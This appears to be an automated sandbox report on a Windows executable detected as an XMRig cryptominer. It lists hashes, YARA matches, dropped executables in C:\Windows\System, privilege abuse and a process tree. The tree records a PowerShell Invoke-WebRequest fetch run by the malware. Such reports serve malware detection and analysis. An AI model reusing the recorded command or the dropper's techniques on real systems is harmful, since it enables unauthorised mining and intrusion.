xmrig | 86258f259e22488684521b9db7199d5e8a44b0b233cea8bc26591f0aa22eca8a

Analysis

max time kernel
120s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
05/06/2024, 14:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
Size

1.4MB
MD5

5745f25a422ae43a8d7c4534e4978940
SHA1

673f6fcef09a7b52776c0efe755aafdf122d93ec
SHA256

86258f259e22488684521b9db7199d5e8a44b0b233cea8bc26591f0aa22eca8a
SHA512

c402011f817e2b1274db11dc962fd7c8c38f173f41f6b825e44aadfbf4145aa803628b809d1e7fcaabf2c932f3c3a0a24cd2909f6f4cdc0ca2c0550abbccc22c
SSDEEP

24576:zv3/fTLF671TilQFG4P5PMkUCCWvLEvjhnXwx8/2Pbx/mbqoBQ0wP1Qx8e:Lz071uv4BPMkHC0IlnASEx/mH

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 48 IoCs

miner

resource	yara_rule
behavioral2/memory/4276-243-0x00007FF64F3B0000-0x00007FF64F7A2000-memory.dmp	xmrig
behavioral2/memory/4580-371-0x00007FF77A320000-0x00007FF77A712000-memory.dmp	xmrig
behavioral2/memory/628-421-0x00007FF661390000-0x00007FF661782000-memory.dmp	xmrig
behavioral2/memory/3120-528-0x00007FF686E70000-0x00007FF687262000-memory.dmp	xmrig
behavioral2/memory/3684-569-0x00007FF75E5C0000-0x00007FF75E9B2000-memory.dmp	xmrig
behavioral2/memory/4432-570-0x00007FF6E4320000-0x00007FF6E4712000-memory.dmp	xmrig
behavioral2/memory/2280-573-0x00007FF655220000-0x00007FF655612000-memory.dmp	xmrig
behavioral2/memory/5020-1002-0x00007FF786FA0000-0x00007FF787392000-memory.dmp	xmrig
behavioral2/memory/3984-701-0x00007FF643920000-0x00007FF643D12000-memory.dmp	xmrig
behavioral2/memory/1752-698-0x00007FF772970000-0x00007FF772D62000-memory.dmp	xmrig
behavioral2/memory/2008-575-0x00007FF744F90000-0x00007FF745382000-memory.dmp	xmrig
behavioral2/memory/3608-3369-0x00007FF7E1100000-0x00007FF7E14F2000-memory.dmp	xmrig
behavioral2/memory/3988-3372-0x00007FF6DD9C0000-0x00007FF6DDDB2000-memory.dmp	xmrig
behavioral2/memory/3852-3371-0x00007FF701560000-0x00007FF701952000-memory.dmp	xmrig
behavioral2/memory/3016-3370-0x00007FF732BA0000-0x00007FF732F92000-memory.dmp	xmrig
behavioral2/memory/1168-574-0x00007FF61D9B0000-0x00007FF61DDA2000-memory.dmp	xmrig
behavioral2/memory/3420-572-0x00007FF68FDD0000-0x00007FF6901C2000-memory.dmp	xmrig
behavioral2/memory/4704-571-0x00007FF774540000-0x00007FF774932000-memory.dmp	xmrig
behavioral2/memory/2544-568-0x00007FF754AC0000-0x00007FF754EB2000-memory.dmp	xmrig
behavioral2/memory/1436-424-0x00007FF708750000-0x00007FF708B42000-memory.dmp	xmrig
behavioral2/memory/1504-3383-0x00007FF68FA70000-0x00007FF68FE62000-memory.dmp	xmrig
behavioral2/memory/3608-3382-0x00007FF7E1100000-0x00007FF7E14F2000-memory.dmp	xmrig
behavioral2/memory/3988-3391-0x00007FF6DD9C0000-0x00007FF6DDDB2000-memory.dmp	xmrig
behavioral2/memory/1752-3395-0x00007FF772970000-0x00007FF772D62000-memory.dmp	xmrig
behavioral2/memory/384-3397-0x00007FF713170000-0x00007FF713562000-memory.dmp	xmrig
behavioral2/memory/628-3399-0x00007FF661390000-0x00007FF661782000-memory.dmp	xmrig
behavioral2/memory/1436-3401-0x00007FF708750000-0x00007FF708B42000-memory.dmp	xmrig
behavioral2/memory/3908-3407-0x00007FF6E7110000-0x00007FF6E7502000-memory.dmp	xmrig
behavioral2/memory/2008-3405-0x00007FF744F90000-0x00007FF745382000-memory.dmp	xmrig
behavioral2/memory/5020-3403-0x00007FF786FA0000-0x00007FF787392000-memory.dmp	xmrig
behavioral2/memory/1168-3422-0x00007FF61D9B0000-0x00007FF61DDA2000-memory.dmp	xmrig
behavioral2/memory/3120-3424-0x00007FF686E70000-0x00007FF687262000-memory.dmp	xmrig
behavioral2/memory/3420-3419-0x00007FF68FDD0000-0x00007FF6901C2000-memory.dmp	xmrig
behavioral2/memory/2280-3416-0x00007FF655220000-0x00007FF655612000-memory.dmp	xmrig
behavioral2/memory/4580-3414-0x00007FF77A320000-0x00007FF77A712000-memory.dmp	xmrig
behavioral2/memory/4432-3468-0x00007FF6E4320000-0x00007FF6E4712000-memory.dmp	xmrig
behavioral2/memory/4704-3463-0x00007FF774540000-0x00007FF774932000-memory.dmp	xmrig
behavioral2/memory/3684-3411-0x00007FF75E5C0000-0x00007FF75E9B2000-memory.dmp	xmrig
behavioral2/memory/2544-3409-0x00007FF754AC0000-0x00007FF754EB2000-memory.dmp	xmrig
behavioral2/memory/4276-3393-0x00007FF64F3B0000-0x00007FF64F7A2000-memory.dmp	xmrig
behavioral2/memory/3640-3389-0x00007FF7CA1F0000-0x00007FF7CA5E2000-memory.dmp	xmrig
behavioral2/memory/3984-3388-0x00007FF643920000-0x00007FF643D12000-memory.dmp	xmrig
behavioral2/memory/3852-3385-0x00007FF701560000-0x00007FF701952000-memory.dmp	xmrig
behavioral2/memory/3016-3379-0x00007FF732BA0000-0x00007FF732F92000-memory.dmp	xmrig
behavioral2/memory/384-334-0x00007FF713170000-0x00007FF713562000-memory.dmp	xmrig
behavioral2/memory/3908-285-0x00007FF6E7110000-0x00007FF6E7502000-memory.dmp	xmrig
behavioral2/memory/3640-203-0x00007FF7CA1F0000-0x00007FF7CA5E2000-memory.dmp	xmrig
behavioral2/memory/1504-42-0x00007FF68FA70000-0x00007FF68FE62000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4708	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
3608	xLGneuS.exe
3016	kUdbQyJ.exe
1504	quFQMmr.exe
3852	XeYUzYW.exe
1752	kVYUFUW.exe
3988	MWxMakN.exe
3640	ioBFfWJ.exe
3984	vFjQqZj.exe
4276	nHBtzYS.exe
3908	xLgluEU.exe
384	KczLEph.exe
4580	VGDsjTV.exe
628	dFpNPCy.exe
1436	naKxSdN.exe
5020	CxNfVKs.exe
3120	fwlPmII.exe
2544	AgPuUwz.exe
3684	vkZDIfp.exe
4432	DOkUtpC.exe
4704	KEOjxCx.exe
3420	QffuaTu.exe
2280	MVvRknj.exe
1168	FcaEKzy.exe
2008	asPejez.exe
1284	MitczcZ.exe
1880	OCHwHqp.exe
4740	VEgbVHo.exe
3380	FtGaVdO.exe
3808	SBKlFAh.exe
2428	DnKIgNo.exe
3188	MPaiNKc.exe
1444	pgCxvyC.exe
944	nVtkreW.exe
4236	eyYsQtm.exe
5028	nsTYzay.exe
1724	HdIeSHl.exe
3096	fgaeiGZ.exe
1128	SVzVcDo.exe
1532	KEJxmSr.exe
4956	qKTgYaF.exe
3964	duxhVpk.exe
3456	tFIfeUD.exe
2736	lYeWAGh.exe
672	xkVpITr.exe
3004	HLHWDuA.exe
4720	vBxbEul.exe
3792	RimAnrR.exe
4396	XmJuXGp.exe
3360	IidLkFc.exe
1696	cNJzrzK.exe
1384	VmmyzuM.exe
3200	lxJCwih.exe
4408	tMUmTce.exe
1296	rwbBuDl.exe
4360	mfukWBe.exe
3856	fKTHPnI.exe
4768	oqrmohf.exe
1784	crjeLPi.exe
2676	AnHJGdc.exe
4436	oXExMMj.exe
776	fghdpLC.exe
4384	HHnEMGw.exe
4476	kTRWOLF.exe
3876	RLDRqom.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4220-0-0x00007FF611C20000-0x00007FF612012000-memory.dmp	upx
behavioral2/memory/3608-12-0x00007FF7E1100000-0x00007FF7E14F2000-memory.dmp	upx
behavioral2/files/0x0007000000023426-19.dat	upx
behavioral2/files/0x0007000000023427-26.dat	upx
behavioral2/files/0x000700000002342c-46.dat	upx
behavioral2/files/0x000700000002342b-45.dat	upx
behavioral2/files/0x0007000000023437-134.dat	upx
behavioral2/files/0x0007000000023445-163.dat	upx
behavioral2/memory/4276-243-0x00007FF64F3B0000-0x00007FF64F7A2000-memory.dmp	upx
behavioral2/memory/4580-371-0x00007FF77A320000-0x00007FF77A712000-memory.dmp	upx
behavioral2/memory/628-421-0x00007FF661390000-0x00007FF661782000-memory.dmp	upx
behavioral2/memory/3120-528-0x00007FF686E70000-0x00007FF687262000-memory.dmp	upx
behavioral2/memory/3684-569-0x00007FF75E5C0000-0x00007FF75E9B2000-memory.dmp	upx
behavioral2/memory/4432-570-0x00007FF6E4320000-0x00007FF6E4712000-memory.dmp	upx
behavioral2/memory/2280-573-0x00007FF655220000-0x00007FF655612000-memory.dmp	upx
behavioral2/memory/5020-1002-0x00007FF786FA0000-0x00007FF787392000-memory.dmp	upx
behavioral2/memory/3984-701-0x00007FF643920000-0x00007FF643D12000-memory.dmp	upx
behavioral2/memory/1752-698-0x00007FF772970000-0x00007FF772D62000-memory.dmp	upx
behavioral2/memory/2008-575-0x00007FF744F90000-0x00007FF745382000-memory.dmp	upx
behavioral2/memory/3608-3369-0x00007FF7E1100000-0x00007FF7E14F2000-memory.dmp	upx
behavioral2/memory/3988-3372-0x00007FF6DD9C0000-0x00007FF6DDDB2000-memory.dmp	upx
behavioral2/memory/3852-3371-0x00007FF701560000-0x00007FF701952000-memory.dmp	upx
behavioral2/memory/3016-3370-0x00007FF732BA0000-0x00007FF732F92000-memory.dmp	upx
behavioral2/memory/1168-574-0x00007FF61D9B0000-0x00007FF61DDA2000-memory.dmp	upx
behavioral2/memory/3420-572-0x00007FF68FDD0000-0x00007FF6901C2000-memory.dmp	upx
behavioral2/memory/4704-571-0x00007FF774540000-0x00007FF774932000-memory.dmp	upx
behavioral2/memory/2544-568-0x00007FF754AC0000-0x00007FF754EB2000-memory.dmp	upx
behavioral2/memory/1436-424-0x00007FF708750000-0x00007FF708B42000-memory.dmp	upx
behavioral2/memory/1504-3383-0x00007FF68FA70000-0x00007FF68FE62000-memory.dmp	upx
behavioral2/memory/3608-3382-0x00007FF7E1100000-0x00007FF7E14F2000-memory.dmp	upx
behavioral2/memory/3988-3391-0x00007FF6DD9C0000-0x00007FF6DDDB2000-memory.dmp	upx
behavioral2/memory/1752-3395-0x00007FF772970000-0x00007FF772D62000-memory.dmp	upx
behavioral2/memory/384-3397-0x00007FF713170000-0x00007FF713562000-memory.dmp	upx
behavioral2/memory/628-3399-0x00007FF661390000-0x00007FF661782000-memory.dmp	upx
behavioral2/memory/1436-3401-0x00007FF708750000-0x00007FF708B42000-memory.dmp	upx
behavioral2/memory/3908-3407-0x00007FF6E7110000-0x00007FF6E7502000-memory.dmp	upx
behavioral2/memory/2008-3405-0x00007FF744F90000-0x00007FF745382000-memory.dmp	upx
behavioral2/memory/5020-3403-0x00007FF786FA0000-0x00007FF787392000-memory.dmp	upx
behavioral2/memory/1168-3422-0x00007FF61D9B0000-0x00007FF61DDA2000-memory.dmp	upx
behavioral2/memory/3120-3424-0x00007FF686E70000-0x00007FF687262000-memory.dmp	upx
behavioral2/memory/3420-3419-0x00007FF68FDD0000-0x00007FF6901C2000-memory.dmp	upx
behavioral2/memory/2280-3416-0x00007FF655220000-0x00007FF655612000-memory.dmp	upx
behavioral2/memory/4580-3414-0x00007FF77A320000-0x00007FF77A712000-memory.dmp	upx
behavioral2/memory/4432-3468-0x00007FF6E4320000-0x00007FF6E4712000-memory.dmp	upx
behavioral2/memory/4704-3463-0x00007FF774540000-0x00007FF774932000-memory.dmp	upx
behavioral2/memory/3684-3411-0x00007FF75E5C0000-0x00007FF75E9B2000-memory.dmp	upx
behavioral2/memory/2544-3409-0x00007FF754AC0000-0x00007FF754EB2000-memory.dmp	upx
behavioral2/memory/4276-3393-0x00007FF64F3B0000-0x00007FF64F7A2000-memory.dmp	upx
behavioral2/memory/3640-3389-0x00007FF7CA1F0000-0x00007FF7CA5E2000-memory.dmp	upx
behavioral2/memory/3984-3388-0x00007FF643920000-0x00007FF643D12000-memory.dmp	upx
behavioral2/memory/3852-3385-0x00007FF701560000-0x00007FF701952000-memory.dmp	upx
behavioral2/memory/3016-3379-0x00007FF732BA0000-0x00007FF732F92000-memory.dmp	upx
behavioral2/memory/384-334-0x00007FF713170000-0x00007FF713562000-memory.dmp	upx
behavioral2/memory/3908-285-0x00007FF6E7110000-0x00007FF6E7502000-memory.dmp	upx
behavioral2/memory/3640-203-0x00007FF7CA1F0000-0x00007FF7CA5E2000-memory.dmp	upx
behavioral2/files/0x0007000000023436-200.dat	upx
behavioral2/files/0x0007000000023440-195.dat	upx
behavioral2/files/0x000700000002343f-194.dat	upx
behavioral2/files/0x0007000000023447-189.dat	upx
behavioral2/files/0x0007000000023446-173.dat	upx
behavioral2/files/0x0007000000023444-160.dat	upx
behavioral2/files/0x0007000000023443-157.dat	upx
behavioral2/files/0x000700000002343c-156.dat	upx
behavioral2/files/0x000700000002343b-151.dat	upx

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\dqTrRIK.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\sHyrVHH.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\encwJuc.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\ZgUSPqj.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\svDGevf.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\kCKzGDO.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\glqsBJi.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\mzsZOgQ.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\rirkOQL.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\zajxqkr.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\EAMjPIJ.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\hXybfti.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\sgpFJBA.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\nhQGXls.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\oJyfWZd.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\eYbwqia.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\HOzXtfy.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\zfQzqzd.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\SzZxzQK.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\JSgtYXX.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\xyVLLBY.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\YIIxqkU.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\LqiCQoe.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\wfkKOuC.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\fgBhUUQ.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\ihNZhHk.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\cRLaLIc.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\cnHbQEC.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\PUnaDgD.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\hsmwbhO.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\heisLXr.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\JMlgCAw.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\utihvWH.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\tdOlfbZ.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\oyFJWWI.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\fltrkjZ.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\TmDeGCy.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\GgHRtYN.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\ZYEjNTF.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\QdQahOD.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\ewkTZts.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\dIwbAWv.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\tkkgEIc.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\RiXdrBF.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\SgTmqQz.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\shgQaRv.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\cbaMhSm.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\SHxBEwH.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\aZPKrWg.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\hcWaTfS.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\KWLqpMS.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\UbyAPlq.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\McQwALg.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\DWDBHEG.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\DKUPKjE.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\shOUeZg.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\eQqEhBx.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\xdhgxug.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\mLOioDX.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\sANYmfH.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\mfukWBe.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\tZOFYca.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\FIpBFly.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
File created	C:\Windows\System\EORmuuM.exe	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4708	powershell.exe
4708	powershell.exe
4708	powershell.exe
4708	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeCreateGlobalPrivilege	3220	dwm.exe
Token: SeChangeNotifyPrivilege	3220	dwm.exe
Token: 33	3220	dwm.exe
Token: SeIncBasePriorityPrivilege	3220	dwm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3432	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4220 wrote to memory of 4708	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	83
PID 4220 wrote to memory of 4708	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	83
PID 4220 wrote to memory of 3608	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	84
PID 4220 wrote to memory of 3608	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	84
PID 4220 wrote to memory of 3016	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	85
PID 4220 wrote to memory of 3016	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	85
PID 4220 wrote to memory of 1504	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	86
PID 4220 wrote to memory of 1504	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	86
PID 4220 wrote to memory of 3852	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	87
PID 4220 wrote to memory of 3852	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	87
PID 4220 wrote to memory of 3988	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	88
PID 4220 wrote to memory of 3988	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	88
PID 4220 wrote to memory of 1752	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	89
PID 4220 wrote to memory of 1752	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	89
PID 4220 wrote to memory of 3640	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	90
PID 4220 wrote to memory of 3640	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	90
PID 4220 wrote to memory of 3984	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	91
PID 4220 wrote to memory of 3984	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	91
PID 4220 wrote to memory of 4276	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	92
PID 4220 wrote to memory of 4276	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	92
PID 4220 wrote to memory of 3908	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	93
PID 4220 wrote to memory of 3908	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	93
PID 4220 wrote to memory of 384	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	94
PID 4220 wrote to memory of 384	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	94
PID 4220 wrote to memory of 4580	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	95
PID 4220 wrote to memory of 4580	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	95
PID 4220 wrote to memory of 628	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	96
PID 4220 wrote to memory of 628	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	96
PID 4220 wrote to memory of 1436	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	97
PID 4220 wrote to memory of 1436	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	97
PID 4220 wrote to memory of 5020	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	98
PID 4220 wrote to memory of 5020	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	98
PID 4220 wrote to memory of 3120	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	99
PID 4220 wrote to memory of 3120	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	99
PID 4220 wrote to memory of 2544	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	100
PID 4220 wrote to memory of 2544	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	100
PID 4220 wrote to memory of 3684	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	101
PID 4220 wrote to memory of 3684	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	101
PID 4220 wrote to memory of 4432	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	102
PID 4220 wrote to memory of 4432	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	102
PID 4220 wrote to memory of 4704	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	103
PID 4220 wrote to memory of 4704	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	103
PID 4220 wrote to memory of 3420	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	104
PID 4220 wrote to memory of 3420	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	104
PID 4220 wrote to memory of 2280	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	105
PID 4220 wrote to memory of 2280	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	105
PID 4220 wrote to memory of 1168	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	106
PID 4220 wrote to memory of 1168	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	106
PID 4220 wrote to memory of 2008	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	107
PID 4220 wrote to memory of 2008	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	107
PID 4220 wrote to memory of 1284	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	108
PID 4220 wrote to memory of 1284	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	108
PID 4220 wrote to memory of 3808	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	109
PID 4220 wrote to memory of 3808	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	109
PID 4220 wrote to memory of 1880	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	110
PID 4220 wrote to memory of 1880	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	110
PID 4220 wrote to memory of 4740	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	111
PID 4220 wrote to memory of 4740	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	111
PID 4220 wrote to memory of 5028	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	112
PID 4220 wrote to memory of 5028	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	112
PID 4220 wrote to memory of 1724	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	113
PID 4220 wrote to memory of 1724	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	113
PID 4220 wrote to memory of 3096	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	114
PID 4220 wrote to memory of 3096	4220	5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe	114

C:\Users\Admin\AppData\Local\Temp\5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\5745f25a422ae43a8d7c4534e4978940_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4708
- C:\Windows\System\xLGneuS.exe
  C:\Windows\System\xLGneuS.exe
  2⤵
  - Executes dropped EXE
  PID:3608
- C:\Windows\System\kUdbQyJ.exe
  C:\Windows\System\kUdbQyJ.exe
  2⤵
  - Executes dropped EXE
  PID:3016
- C:\Windows\System\quFQMmr.exe
  C:\Windows\System\quFQMmr.exe
  2⤵
  - Executes dropped EXE
  PID:1504
